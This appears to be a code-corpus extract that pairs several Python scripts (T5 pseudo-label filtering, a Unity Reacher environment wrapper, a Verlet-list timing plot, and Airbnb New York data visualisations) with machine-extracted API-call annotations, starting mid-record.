ret_time=False\n )\n', (8507, 8657), False, 'from experiments.evaluation import run_model_cv\n'), ((9441, 9467), 'pandas.DataFrame', 'pd.DataFrame', (['metrics_list'], {}), '(metrics_list)\n', (9453, 9467), True, 'import pandas as pd\n'), ((9491, 9535), 'pandas.concat', 'pd.concat', (['[results, causal_metrics]'], {'axis': '(1)'}), '([results, causal_metrics], axis=1)\n', (9500, 9535), True, 'import pandas as pd\n'), ((9715, 9726), 'time.time', 'time.time', ([], {}), '()\n', (9724, 9726), False, 'import time\n'), ((3123, 3139), 
'sklearn.preprocessing.StandardScaler', 'StandardScaler', ([], {}), '()\n', (3137, 3139), False, 'from sklearn.preprocessing import StandardScaler, PolynomialFeatures\n'), ((3148, 3165), 'sklearn.svm.SVR', 'SVR', ([], {'kernel': '"""rbf"""'}), "(kernel='rbf')\n", (3151, 3165), False, 'from sklearn.svm import SVR, LinearSVR, SVC, LinearSVC\n'), ((3247, 3263), 'sklearn.preprocessing.StandardScaler', 'StandardScaler', ([], {}), '()\n', (3261, 3263), False, 'from sklearn.preprocessing import StandardScaler, PolynomialFeatures\n'), ((3272, 3293), 'sklearn.svm.SVR', 'SVR', ([], {'kernel': '"""sigmoid"""'}), "(kernel='sigmoid')\n", (3275, 3293), False, 'from sklearn.svm import SVR, LinearSVR, SVC, LinearSVC\n'), ((3373, 3389), 'sklearn.preprocessing.StandardScaler', 'StandardScaler', ([], {}), '()\n', (3387, 3389), False, 'from sklearn.preprocessing import StandardScaler, PolynomialFeatures\n'), ((3398, 3409), 'sklearn.svm.LinearSVR', 'LinearSVR', ([], {}), '()\n', (3407, 3409), False, 'from sklearn.svm import SVR, LinearSVR, SVC, LinearSVC\n'), ((5087, 5103), 'sklearn.preprocessing.StandardScaler', 'StandardScaler', ([], {}), '()\n', (5101, 5103), False, 'from sklearn.preprocessing import StandardScaler, PolynomialFeatures\n'), ((5112, 5147), 'sklearn.svm.SVC', 'SVC', ([], {'kernel': '"""rbf"""', 'probability': '(True)'}), "(kernel='rbf', probability=True)\n", (5115, 5147), False, 'from sklearn.svm import SVR, LinearSVR, SVC, LinearSVC\n'), ((5229, 5245), 'sklearn.preprocessing.StandardScaler', 'StandardScaler', ([], {}), '()\n', (5243, 5245), False, 'from sklearn.preprocessing import StandardScaler, PolynomialFeatures\n'), ((5297, 5336), 'sklearn.svm.SVC', 'SVC', ([], {'kernel': '"""sigmoid"""', 'probability': '(True)'}), "(kernel='sigmoid', probability=True)\n", (5300, 5336), False, 'from sklearn.svm import SVR, LinearSVR, SVC, LinearSVC\n'), ((8813, 8824), 'time.time', 'time.time', ([], {}), '()\n', (8822, 8824), False, 'import time\n'), ((8934, 9038), 'experiments.evaluation.calculate_metrics', 'calculate_metrics', (['gen_model', 'estimator'], {'n_seeds': 'n_seeds_metrics', 'conf_ints': '(False)', 'ate': 'ate', 'ite': 'ite'}), '(gen_model, estimator, n_seeds=n_seeds_metrics, conf_ints=\n False, ate=ate, ite=ite)\n', (8951, 9038), False, 'from experiments.evaluation import calculate_metrics\n'), ((9112, 9123), 'time.time', 'time.time', ([], {}), '()\n', (9121, 9123), False, 'import time\n')]
|
import os
import json
import torch
import torch.nn as nn
import torch.optim as optim
import torch.utils as utils
import sys
import argparse
import matplotlib
import pdb
import numpy as np
import time
import random
import re
import time
import matplotlib.pyplot as plt
from tqdm import tqdm
from tqdm import trange
from sklearn import metrics
from torch.utils import data
from collections import Counter
from transformers import AdamW, get_linear_schedule_with_warmup
from transformers import T5Tokenizer, T5ForConditionalGeneration, T5Config
from torch.cuda.amp import autocast as autocast
from torch.cuda.amp import GradScaler as GradScaler
def seed_everything(args):
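    """Seed Python, NumPy and PyTorch RNGs so runs are reproducible."""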
random.seed(args.seed)
    os.environ['PYTHONHASHSEED'] = str(args.seed)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
torch.cuda.manual_seed(args.seed)
torch.backends.cudnn.deterministic = True
    torch.backends.cudnn.benchmark = False  # benchmarking would pick non-deterministic kernels
def ifinclude(str1,str2):
#name.lower() in linelist[0].lower():
str1list = str1.lower().split(' ') ####name
str2list = str2.lower().split(' ') ####linelist
ifin = False
for i in range(0,len(str2list)):
if str2list[i] == str1list[0]:
ifin = True
            for j in range(1, len(str1list)):
                if i + j >= len(str2list) or str2list[i + j] != str1list[j]:
                    ifin = False
                    break
if ifin == True:
break
else:
continue
return ifin
def handlefile(inputfile,outputfile,allnumber,trainnumber):
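    """Filter and sample pseudo-labelled sentences.
    Reads `inputfile` (lines of the form 'sentence __ans__ entity ! type ; ...'),
    keeps the first sentence seen for each (entity, type) pair, samples
    `allnumber[type]` examples per entity type into `outputfile`, and splits them
    into train_mem.txt / valid_mem.txt with `trainnumber[type]` training examples
    per type. All kept examples are also dumped to the file 'allgenerate'.
    """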
f = open(inputfile,'r')
allres = {}
alltype = []
for key in allnumber.keys():
alltype.append(key)
insen = 0
allin = {}
notinsen = 0
allnotin = {}
while True:
line = f.readline().strip()
if not line:
break
linelist = line.split("__ans__")
if len(linelist) != 2:
continue
entitylist = linelist[1]
if entitylist == 'end':
continue
if ';' not in entitylist:
continue
allentity = entitylist.split(";")
if len(allentity) != 2:
continue
firstentity = allentity[0]
#print(firstentity)
if '!' not in firstentity:
continue
splitent = firstentity.split('!')
if len(splitent) != 2:
continue
thistype = splitent[1].strip()
#print(thistype)
if thistype not in alltype:
continue
#print(linelist[0] + '\t' + linelist[1])
name = linelist[1].split(";")[0].split("!")[0].strip(' ')
entype = linelist[1].split(";")[0].split("!")[1].strip(' ')
whole = name + " ! " + entype + " ;"
#print(name)
#####some filters
thissen = linelist[0]
####length
# senlist = thissen.split(' ')
# if len(senlist) <= 3:
# continue
# digitnum = 0
# for one in senlist:
# if re.search(r'\d', one):
# digitnum += 1
# if len(senlist) - digitnum < 1:
# continue
#ifin = ifinclude(name,linelist[0])
#if ifin:
if name.lower() in linelist[0].lower():
length = len(name)
startindex = linelist[0].lower().find(name.lower())
endindex = startindex + length
toreplace = linelist[0][startindex:endindex]
#newsen = linelist[0]
newsen = linelist[0].replace(toreplace,name)
if thistype not in allin:
#allin[thistype] = [linelist[0] + '\t' + linelist[1]]
allin[thistype] = {}
if whole not in allin[thistype]:
insen += 1
allin[thistype][whole] = [newsen]
#else:
# allin[thistype][whole].append(linelist[0])
else:
#allin[thistype].append(linelist[0] + '\t' + linelist[1])
if whole not in allin[thistype]:
insen += 1
allin[thistype][whole] = [newsen]
#else:
# allin[thistype][whole].append(linelist[0])
else:
########some filter
##ensure the entity has similar words in sen
# if name.lower() in linelist[0].lower():
# ###thisone will be used
# str1list = name.lower().split(' ') ####name
# nolowlist = name.split(' ')
# str2list = linelist[0].lower().split(' ') ####linelist
# ifin = False
# touselist = linelist[0].split(' ')
# for i in range(0, len(str2list)):
# if str1list[0] in str2list[i]:
# touselist[i] = nolowlist[0]
# for j in range(1,len(str1list)):
# touselist[i+j] = nolowlist[j]
# else:
# continue
# newsen = ' '.join(touselist)
# else:
# ####whether first similar 0.75 5
# str1list = name.lower().split(' ')
# tousestr = str1list[0]
# str2list = linelist[0].lower().split(' ')
# ifhave = 0
# index = -1
# for j in range(0,len(str2list)):
# thistoken = str2list[j]
# samenum = 0
# for k in range(min(len(tousestr),len(thistoken))):
# if tousestr[k] == thistoken[k]:
# samenum += 1
# else:
# break
# if min(len(tousestr),len(thistoken)) == 0:
# continue
# if samenum >= 5 or float(samenum) / float(min(len(tousestr),len(thistoken))) >= 0.75:
# ifhave = 1
# index = j
# break
# if not ifhave:
# continue
# else:
# ###replace
# newlinelist = linelist[0].split()[0:index] + name.split(' ') + linelist[0].split()[index+1:]
# newsen = " ".join(newlinelist)
if thistype not in allnotin:
#allnotin[thistype] = [linelist[0] + '\t' + linelist[1]]
allnotin[thistype] = {}
if whole not in allnotin[thistype]:
notinsen += 1
newsen = linelist[0] + " " + name
allnotin[thistype][whole] = [newsen]
#else:
# allnotin[thistype][whole].append(linelist[0])
else:
#allnotin[thistype].append(linelist[0] + '\t' + linelist[1])
if whole not in allnotin[thistype]:
notinsen += 1
newsen = linelist[0] + " " + name
allnotin[thistype][whole] = [newsen]
#else:
# allnotin[thistype][whole].append(linelist[0])
f.close()
print(insen)
print(notinsen)
# for key in allin:
# print(key+"\t"+str(len(allin[key])))
# for key in allnotin:
# print(key+"\t"+str(len(allnotin[key])))
# for key in allin:
# for one in allin[key]:
# for aa in allin[key][one]:
# print(aa+" "+one)
# for key in allnotin:
# for one in allnotin[key]:
# for aa in allnotin[key][one]:
# print(aa + " " + one)
finalres = {}
fall = open("allgenerate",'w')
for key in allnumber.keys():
finalres[key] = []
for key in allin:
for one in allin[key]:
for aa in allin[key][one]:
finalres[key].append(aa+"\t"+one)
fall.write(aa+"\t"+one+'\n')
for key in allnotin:
for one in allnotin[key]:
for aa in allnotin[key][one]:
finalres[key].append(aa+"\t"+one)
fall.write(aa + "\t" + one + '\n')
fall.close()
#for key in finalres.keys():
# print(len(finalres[key]))
sampleres = []
trainres = []
validres = []
for key in finalres.keys():
thissample = random.sample(finalres[key],allnumber[key])
#print(thissample)
sampleres.extend(thissample)
####divide to train and valid
thistrainnum = trainnumber[key]
indexlist = [i for i in range(allnumber[key])]
#print(indexlist)
trainuse = random.sample(indexlist,thistrainnum)
#print(trainuse)
for j in range(allnumber[key]):
if j in trainuse:
trainres.append(thissample[j])
else:
validres.append(thissample[j])
#print(trainres)
#print(validres)
#print(sampleres)
fo = open(outputfile, 'w')
for one in sampleres:
fo.write(one+"\n")
fo.close()
fot = open('train_mem.txt', 'w')
for one in trainres:
fot.write(one+"\n")
fot.close()
fov = open('valid_mem.txt', 'w')
for one in validres:
fov.write(one + "\n")
fov.close()
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="latentRE")
parser.add_argument("--model", dest="model", type=str,
default="T5", help="{T5}")
parser.add_argument("--seed", dest="seed", type=int,
default=160, help="seed for network")
args = parser.parse_args()
seed_everything(args)
if args.model == "T5":
#seed 100
#train: person:10 location:12 org:6 mix:7
#valid: person:16 location:12 org:11 mix:8
print("right!")
# allnumber = {'org': 17, 'location': 24, 'person': 26, 'mix': 15}
# trainnumber = {'org': 6, 'location': 12, 'person': 10, 'mix': 7}
# allnumber = {'org':15,'location':14,'person':11,'mix':9}
# trainnumber = {'org':7,'location':8,'person':5,'mix':4}
allnumber = {'org': 16, 'location': 21, 'person': 20, 'mix': 16}
trainnumber = {'org': 7, 'location': 10, 'person': 11, 'mix': 6}
handlefile("pseudosamples", "allselect", allnumber, trainnumber)
else:
raise Exception("No such model! Please make sure that `model` takes the value in {T5}")
|
[
"numpy.random.seed",
"argparse.ArgumentParser",
"random.sample",
"torch.manual_seed",
"torch.cuda.manual_seed",
"random.seed"
] |
[((674, 696), 'random.seed', 'random.seed', (['args.seed'], {}), '(args.seed)\n', (685, 696), False, 'import random\n'), ((749, 774), 'numpy.random.seed', 'np.random.seed', (['args.seed'], {}), '(args.seed)\n', (763, 774), True, 'import numpy as np\n'), ((779, 807), 'torch.manual_seed', 'torch.manual_seed', (['args.seed'], {}), '(args.seed)\n', (796, 807), False, 'import torch\n'), ((812, 845), 'torch.cuda.manual_seed', 'torch.cuda.manual_seed', (['args.seed'], {}), '(args.seed)\n', (834, 845), False, 'import torch\n'), ((9238, 9285), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""latentRE"""'}), "(description='latentRE')\n", (9261, 9285), False, 'import argparse\n'), ((8280, 8324), 'random.sample', 'random.sample', (['finalres[key]', 'allnumber[key]'], {}), '(finalres[key], allnumber[key])\n', (8293, 8324), False, 'import random\n'), ((8566, 8604), 'random.sample', 'random.sample', (['indexlist', 'thistrainnum'], {}), '(indexlist, thistrainnum)\n', (8579, 8604), False, 'import random\n')]
|
import numpy as np
import torch
class UnityEnv():
"""Unity Reacher Environment Wrapper
https://github.com/Unity-Technologies/ml-agents/blob/master/docs/Learning-Environment-Examples.md
"""
def __init__(self, env_file='data/Reacher.exe', no_graphics=True, mlagents=False):
if mlagents:
from mlagents.envs.environment import UnityEnvironment
else:
from unityagents import UnityEnvironment
self.env = UnityEnvironment(file_name=env_file, no_graphics=no_graphics)
self.brain_name = self.env.brain_names[0]
brain = self.env.brains[self.brain_name]
self.action_size = brain.vector_action_space_size
if type(self.action_size) != int:
self.action_size = self.action_size[0]
env_info = self.env.reset(train_mode=True)[self.brain_name]
self.state_size = env_info.vector_observations.shape[1]
self.num_agents = len(env_info.agents)
def reset(self, train=True):
env_info = self.env.reset(train_mode=train)[self.brain_name]
return env_info.vector_observations
def close(self):
self.env.close()
def step(self, actions):
actions = np.clip(actions, -1, 1)
env_info = self.env.step(actions)[self.brain_name]
next_states = env_info.vector_observations
rewards = env_info.rewards
dones = env_info.local_done
return next_states, np.array(rewards), np.array(dones)
@property
def action_shape(self):
return (self.num_agents, self.action_size)
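# Minimal usage sketch (assumes a local Reacher build at data/Reacher.exe and the
# unityagents package; the random actions are purely illustrative):
if __name__ == "__main__":
    env = UnityEnv(env_file='data/Reacher.exe', no_graphics=True)
    states = env.reset(train=True)
    actions = np.random.randn(*env.action_shape)  # shape (num_agents, action_size)
    next_states, rewards, dones = env.step(actions)
    print(rewards.shape, dones.shape)
    env.close()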
|
[
"numpy.array",
"unityagents.UnityEnvironment",
"numpy.clip"
] |
[((468, 529), 'unityagents.UnityEnvironment', 'UnityEnvironment', ([], {'file_name': 'env_file', 'no_graphics': 'no_graphics'}), '(file_name=env_file, no_graphics=no_graphics)\n', (484, 529), False, 'from unityagents import UnityEnvironment\n'), ((1213, 1236), 'numpy.clip', 'np.clip', (['actions', '(-1)', '(1)'], {}), '(actions, -1, 1)\n', (1220, 1236), True, 'import numpy as np\n'), ((1447, 1464), 'numpy.array', 'np.array', (['rewards'], {}), '(rewards)\n', (1455, 1464), True, 'import numpy as np\n'), ((1466, 1481), 'numpy.array', 'np.array', (['dones'], {}), '(dones)\n', (1474, 1481), True, 'import numpy as np\n')]
|
import matplotlib.pyplot as plt
import numpy as np
import re
import os
import sys
from matplotlib import rcParams
from cycler import cycler
import itertools
if len(sys.argv) < 2:
print("Especifique la carpeta con resultados con la siguiente sintaxis:")
print("python %s carpeta_resultados" % sys.argv[0])
exit(1)
results_folder = sys.argv[1]
digit = r'\d*\.?\d+'
regex = r'^result_(%s)_(%s)_%s_\w+_%s_%s_%s_%s_\w+_%s_\.txt$' % (digit, digit, digit, digit, digit, digit, digit, digit)
"""
print(regex)
tomatch = 'result_1.1000_0.6000_50.0000_WallPeriodicBC_1_0.5000_1_0.0100_False_1024_.txt'
matches = re.match(regex, tomatch)
if matches:
print(matches.group(1))
print(matches.group(2))
else:
print("no match")
"""
files = os.listdir(results_folder)
time_lambda_curves = {}
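# Maps eta -> {'times': [...], 'lambdas': [...]} so one time-vs-lambda curve can
# be drawn per eta value found in the result files.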
for filename in files:
matches = re.match(regex, filename)
if not matches:
continue
the_lambda = float(matches.group(1))
the_eta = float(matches.group(2))
with open(results_folder + filename, 'r') as f:
first_line = f.readline()
the_time = float(first_line)
if the_eta not in time_lambda_curves:
time_lambda_curves[the_eta] = {
'times': [],
'lambdas': []
}
time_lambda_curves[the_eta]['times'].append(the_time)
time_lambda_curves[the_eta]['lambdas'].append(the_lambda)
marker = itertools.cycle(('s', 'X', '+', 'o', '*', '>', 'h', 'd', '.'))
lines = itertools.cycle((':', '-.', '--', '-'))
# Plot style settings
plt.figure(figsize=(12, 10), dpi=80, facecolor='w', edgecolor='k')
plt.rc('lines', linewidth=1)
plt.rc('axes', prop_cycle=(cycler('color', ['blue', 'green', 'red',
'magenta', 'black',
'purple', 'pink', 'brown',
'orange', 'coral',
'lightblue', 'lime', 'lavender',
'turquoise', 'darkgreen', 'tan',
'salmon', 'gold',
'darkred', 'darkblue'])))
to_plot = []
for eta, values in time_lambda_curves.items():
to_plot.append((eta, values))
to_plot.sort()
#for eta, values in time_lambda_curves.items():
for eta, values in to_plot:
the_times = values['times']
the_lambdas = values['lambdas']
order = np.argsort(the_lambdas)
xs = np.array(the_lambdas)[order]
ys = np.array(the_times)[order]
plt.plot(xs, ys, label="$\eta = %.1f$" % eta, marker=next(marker), markersize=15, linewidth=3)
plt.xticks(np.arange(0.0, 1.4, 0.1))
plt.yticks(np.arange(0, 10001, 1000))
plt.xlabel('$\lambda$', fontsize=18)
plt.ylabel('Tiempo (s)', fontsize=18)
plt.title('Tiempo de ejecución del algoritmo de Listas de Verlet\n para un tiempo de simulación físico de 50 segundos', fontsize=22, y=1.02)
#plot.legend(loc=2, prop={'size': 6})
plt.legend(prop={'size': 16})
plt.grid(alpha=0.5)
plt.show()
|
[
"matplotlib.pyplot.title",
"cycler.cycler",
"matplotlib.pyplot.show",
"matplotlib.pyplot.legend",
"matplotlib.pyplot.ylabel",
"re.match",
"numpy.argsort",
"matplotlib.pyplot.figure",
"numpy.array",
"matplotlib.pyplot.rc",
"numpy.arange",
"itertools.cycle",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.grid",
"os.listdir"
] |
[((753, 779), 'os.listdir', 'os.listdir', (['results_folder'], {}), '(results_folder)\n', (763, 779), False, 'import os\n'), ((1396, 1458), 'itertools.cycle', 'itertools.cycle', (["('s', 'X', '+', 'o', '*', '>', 'h', 'd', '.')"], {}), "(('s', 'X', '+', 'o', '*', '>', 'h', 'd', '.'))\n", (1411, 1458), False, 'import itertools\n'), ((1467, 1506), 'itertools.cycle', 'itertools.cycle', (["(':', '-.', '--', '-')"], {}), "((':', '-.', '--', '-'))\n", (1482, 1506), False, 'import itertools\n'), ((1552, 1618), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(12, 10)', 'dpi': '(80)', 'facecolor': '"""w"""', 'edgecolor': '"""k"""'}), "(figsize=(12, 10), dpi=80, facecolor='w', edgecolor='k')\n", (1562, 1618), True, 'import matplotlib.pyplot as plt\n'), ((1619, 1647), 'matplotlib.pyplot.rc', 'plt.rc', (['"""lines"""'], {'linewidth': '(1)'}), "('lines', linewidth=1)\n", (1625, 1647), True, 'import matplotlib.pyplot as plt\n'), ((3019, 3048), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'prop': "{'size': 16}"}), "(prop={'size': 16})\n", (3029, 3048), True, 'import matplotlib.pyplot as plt\n'), ((3049, 3068), 'matplotlib.pyplot.grid', 'plt.grid', ([], {'alpha': '(0.5)'}), '(alpha=0.5)\n', (3057, 3068), True, 'import matplotlib.pyplot as plt\n'), ((3069, 3079), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (3077, 3079), True, 'import matplotlib.pyplot as plt\n'), ((843, 868), 're.match', 're.match', (['regex', 'filename'], {}), '(regex, filename)\n', (851, 868), False, 'import re\n'), ((2470, 2493), 'numpy.argsort', 'np.argsort', (['the_lambdas'], {}), '(the_lambdas)\n', (2480, 2493), True, 'import numpy as np\n'), ((2756, 2793), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""$\\\\lambda$"""'], {'fontsize': '(18)'}), "('$\\\\lambda$', fontsize=18)\n", (2766, 2793), True, 'import matplotlib.pyplot as plt\n'), ((2797, 2834), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Tiempo (s)"""'], {'fontsize': '(18)'}), "('Tiempo (s)', fontsize=18)\n", (2807, 2834), True, 'import matplotlib.pyplot as plt\n'), ((2839, 2992), 'matplotlib.pyplot.title', 'plt.title', (['"""Tiempo de ejecución del algoritmo de Listas de Verlet\n para un tiempo de simulación físico de 50 segundos"""'], {'fontsize': '(22)', 'y': '(1.02)'}), '(\n """Tiempo de ejecución del algoritmo de Listas de Verlet\n para un tiempo de simulación físico de 50 segundos"""\n , fontsize=22, y=1.02)\n', (2848, 2992), True, 'import matplotlib.pyplot as plt\n'), ((1675, 1897), 'cycler.cycler', 'cycler', (['"""color"""', "['blue', 'green', 'red', 'magenta', 'black', 'purple', 'pink', 'brown',\n 'orange', 'coral', 'lightblue', 'lime', 'lavender', 'turquoise',\n 'darkgreen', 'tan', 'salmon', 'gold', 'darkred', 'darkblue']"], {}), "('color', ['blue', 'green', 'red', 'magenta', 'black', 'purple',\n 'pink', 'brown', 'orange', 'coral', 'lightblue', 'lime', 'lavender',\n 'turquoise', 'darkgreen', 'tan', 'salmon', 'gold', 'darkred', 'darkblue'])\n", (1681, 1897), False, 'from cycler import cycler\n'), ((2504, 2525), 'numpy.array', 'np.array', (['the_lambdas'], {}), '(the_lambdas)\n', (2512, 2525), True, 'import numpy as np\n'), ((2542, 2561), 'numpy.array', 'np.array', (['the_times'], {}), '(the_times)\n', (2550, 2561), True, 'import numpy as np\n'), ((2684, 2708), 'numpy.arange', 'np.arange', (['(0.0)', '(1.4)', '(0.1)'], {}), '(0.0, 1.4, 0.1)\n', (2693, 2708), True, 'import numpy as np\n'), ((2725, 2750), 'numpy.arange', 'np.arange', (['(0)', '(10001)', '(1000)'], {}), '(0, 10001, 1000)\n', (2734, 2750), True, 'import numpy as np\n')]
|
import csv
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.ticker as tck
from PIL import Image
# for testing purposes, remove this later!
from sys import exit
"""Data visualization on the Airbnb New York dataset from Kaggle.
The dataset provides 16 pieces of data in the following order:
0: id
1: name
2: host_id
3: host_name
4: neighbourhood_group
5: neighbourhood
6: latitude
7: longitude
8: room_type
9: price
10: minimum_nights
11: number_of_reviews
12: last_review
13: reviews_per_month
14: calculated_host_listings_count
15: availability_365
All fields are fairly self-explanatory. I will not be using the 'id' or the
'host_id' fields since they are not relevant, nor the 'name' field since it does
not make sense in this context.
This project is fully open source and free to use and share. Enjoy!
"""
header = []
data = {}
num_columns = 16
num_entries = 0
with open('new_york_data.csv', encoding='utf-8') as csv_file:
reader = csv.reader(csv_file, delimiter=',')
# read the header
header = next(reader)
# read the entries
body = []
for row in reader:
body.append(row)
num_entries = len(body)
# parse the entries into np arrays and store them under in the data list
for i in range(num_columns):
dtype = 'str'
# price, minimum nights, number of reviews
# calculated host listings count, annual availability
if i == 9 or i == 10 or i == 11 or i == 14 or i == 15:
dtype = 'int64'
# latitude, longitude, review per month
if i == 6 or i == 7 or i == 13:
dtype = 'float64'
# reviews per month is blank sometimes in the original dataset
if i == 13:
# numpy cannot process empty strings to floats; so check for this
col_data = np.asarray([body[j][i] if len(body[j][i]) > 0 else 0.0 for j in range(num_entries)], dtype=dtype)
else:
col_data = np.asarray([body[j][i] for j in range(num_entries)], dtype=dtype)
data[header[i]] = col_data
# Area that the cover maps; experimentally determined
# (latitude, longitude)
min_coords = (40.49279, -74.26442)
max_coords = (40.91906, -73.68299)
long_range = max_coords[1] - min_coords[1]
lat_range = max_coords[0] - min_coords[0]
image_extent = (min_coords[1], max_coords[1], min_coords[0], max_coords[0])
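# matplotlib's imshow extent is (left, right, bottom, top), i.e. here
# (min longitude, max longitude, min latitude, max latitude)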
new_york_img = Image.open('new_york_map.png')
# use large figure sizes
matplotlib.rcParams['figure.figsize'] = (12, 7)
# Room Type Bar Graph
room_types, room_types_count = np.unique(data['room_type'], return_counts=True)
plt.title('Distribution of Room Types')
room_types_norm = room_types_count / sum(room_types_count)
plt.barh(room_types, room_types_norm)
ax = plt.gca()
ax.xaxis.set_major_formatter(tck.FuncFormatter(lambda x, _: '{:.0%}'.format(x)))
plt.show()
# Neighbourhood Groups
n_groups, n_groups_count = np.unique(data['neighbourhood_group'], return_counts=True)
n_groups_colors = ['#1a535c', '#4ecdc4', '#b2ff66', '#ff6b6b', '#ffe66d']
explode = np.zeros((len(n_groups),), dtype='float64')
for idx, group in enumerate(n_groups):
if group == 'Manhattan':
explode[idx] = 0.1
break
plt.title('Distribution of Neighbourhood Groups')
wedges, texts, _ = plt.pie(
n_groups_count,
labels=n_groups,
explode=explode,
autopct='%1.1f%%',
pctdistance=0.8,
colors=n_groups_colors)
plt.show()
# Neighbourhoods
nbhs, nbhs_count = np.unique(data['neighbourhood'], return_counts=True)
# zip the neighbourhood name and count into a tuple to sort by count
nbhs_sorted_tuples = sorted(list(zip(nbhs, nbhs_count)), key=lambda elem: elem[1], reverse=True)
# unzip the sorted tuples back into a list of names and a list of counts
nbhs_sorted, nbhs_sorted_count = list(zip(*nbhs_sorted_tuples))
# take only the top 20
nbhs_sorted = nbhs_sorted[:20]
nbhs_sorted_count = nbhs_sorted_count[:20]
nbhs_price_avgs = []
for nbh in nbhs_sorted:
prices = data['price'][data['neighbourhood'] == nbh]
nbhs_price_avgs.append(np.average(prices))
fig, ax1 = plt.subplots()
plt.title('Most Popular Neighbourhoods and Average Price')
# pad the bottom of the plot to prevent text clipping
plt.subplots_adjust(bottom=0.2)
# rotate the labels so that they are easier to read
ax1.set_xticklabels(nbhs_sorted, rotation=45, ha='right')
ax1.set_xlabel('Neighbourhood')
# plot number of places on the left y-axis
ax1.bar(nbhs_sorted, nbhs_sorted_count, width=-0.2, align='edge')
ax1.set_ylabel('Number of places (blue)')
# plot average price on the right y-axis
ax2 = ax1.twinx()
ax2.bar(nbhs_sorted, nbhs_price_avgs, width=0.2, align='edge', color='orange')
ax2.set_ylabel('Average price (orange)')
plt.show()
# Price Histogram
group_prices = []
# separate the price data based on neighbourhood groups
for group in n_groups:
group_prices.append(data['price'][data['neighbourhood_group'] == group])
# plot the price data for each group separately as stacked bars
# use only prices less than 500 since most of the data belongs in this range
# this also lets us not worry about huge outliers (there are a few places whose
# nightly price is in the many thousands)
plt.hist(
group_prices,
histtype='barstacked',
bins=25,
range=(0, 500),
edgecolor='white',
color=n_groups_colors)
plt.legend(n_groups, loc='upper right')
plt.title('Distribution of Price per Night')
plt.xlim(0, 500)
plt.ylabel('Number of places')
plt.xlabel('Price range (USD)')
plt.show()
# Average Price Heatmap
# compute the average pricing over a grid of 150 by 150
price_heatmap_bins = 150
price_heatmap_sum = np.zeros((price_heatmap_bins, price_heatmap_bins), dtype='float64')
price_heatmap_count = np.zeros((price_heatmap_bins, price_heatmap_bins), dtype='float64')
for long, lat, price in zip(data['longitude'], data['latitude'], data['price']):
# take only prices below 500 to be consistent with price histogram
if price < 500:
idx_long = int((long - min_coords[1]) / long_range * price_heatmap_bins)
idx_lat = int((lat - min_coords[0]) / lat_range * price_heatmap_bins)
price_heatmap_sum[idx_lat, idx_long] += price
price_heatmap_count[idx_lat, idx_long] += 1
# ensure that a divide by zero will not occur
price_heatmap_count = np.clip(price_heatmap_count, 1, None)
price_heatmap = price_heatmap_sum / price_heatmap_count
plt.imshow(new_york_img, extent=image_extent)
plt.imshow(price_heatmap, extent=image_extent, origin='lower', alpha=0.9)
plt.colorbar()
plt.title('Average Price per Night Heatmap')
plt.show()
# Housing Scatter Plot
plt.imshow(new_york_img, extent=image_extent)
# divide locations based on groups and display them as a scatter on the New York map
for group, color in zip(n_groups, n_groups_colors):
plt.scatter(
data['longitude'][data['neighbourhood_group'] == group],
data['latitude'][data['neighbourhood_group'] == group],
s=2,
color=color)
plt.legend(n_groups, loc='upper left', markerscale=5)
plt.title('Plot of Housing Locations')
plt.xlabel('Longitude')
plt.ylabel('Latitude')
plt.show()
# Housing Heatmap
plt.imshow(new_york_img, extent=image_extent)
plt.hist2d(data['longitude'], data['latitude'], bins=150, alpha=0.7)
plt.title('Heatmap of Housing Locations')
plt.colorbar()
plt.xlabel('Longitude')
plt.ylabel('Latitude')
plt.show()
# Minimum Nights Distribution
group_min_nights = []
# separate the price data based on neighbourhood groups
for group in n_groups:
group_min_nights.append(data['minimum_nights'][data['neighbourhood_group'] == group])
# plot the price data for each group separately as stacked bars
plt.hist(
group_min_nights,
histtype='barstacked',
bins=20,
range=(1, 21),
edgecolor='white',
color=n_groups_colors)
plt.title('Minimum Number of Nights Required')
plt.legend(n_groups, loc='upper right')
plt.xlim(1, 21)
plt.xticks(np.arange(1, 21))
plt.xlabel('Minimum Nights')
plt.ylabel('Number of Places')
plt.show()
# Number of Reviews
# compute the average number of reviews over a grid of 150 by 150
num_reviews_bins = 150
num_reviews_sum = np.zeros((num_reviews_bins, num_reviews_bins), dtype='float64')
num_reviews_count = np.zeros((num_reviews_bins, num_reviews_bins), dtype='float64')
for long, lat, n_reviews in zip(data['longitude'], data['latitude'], data['number_of_reviews']):
    idx_long = int((long - min_coords[1]) / long_range * num_reviews_bins)
    idx_lat = int((lat - min_coords[0]) / lat_range * num_reviews_bins)
    num_reviews_sum[idx_lat, idx_long] += n_reviews
    num_reviews_count[idx_lat, idx_long] += 1
# ensure that a divide by zero will not occur
num_reviews_count = np.clip(num_reviews_count, 1, None)
num_reviews = num_reviews_sum / num_reviews_count
plt.imshow(new_york_img, extent=image_extent)
plt.imshow(num_reviews, extent=image_extent, origin='lower', alpha=0.9)
plt.colorbar()
plt.title('Average Number of Reviews Heatmap')
plt.show()
|
[
"matplotlib.pyplot.title",
"csv.reader",
"numpy.clip",
"numpy.arange",
"matplotlib.pyplot.gca",
"numpy.unique",
"matplotlib.pyplot.imshow",
"matplotlib.pyplot.colorbar",
"matplotlib.pyplot.subplots",
"matplotlib.pyplot.show",
"numpy.average",
"matplotlib.pyplot.legend",
"matplotlib.pyplot.barh",
"matplotlib.pyplot.pie",
"matplotlib.pyplot.hist2d",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.subplots_adjust",
"matplotlib.pyplot.xlim",
"matplotlib.pyplot.hist",
"matplotlib.pyplot.scatter",
"numpy.zeros",
"PIL.Image.open",
"matplotlib.pyplot.xlabel"
] |
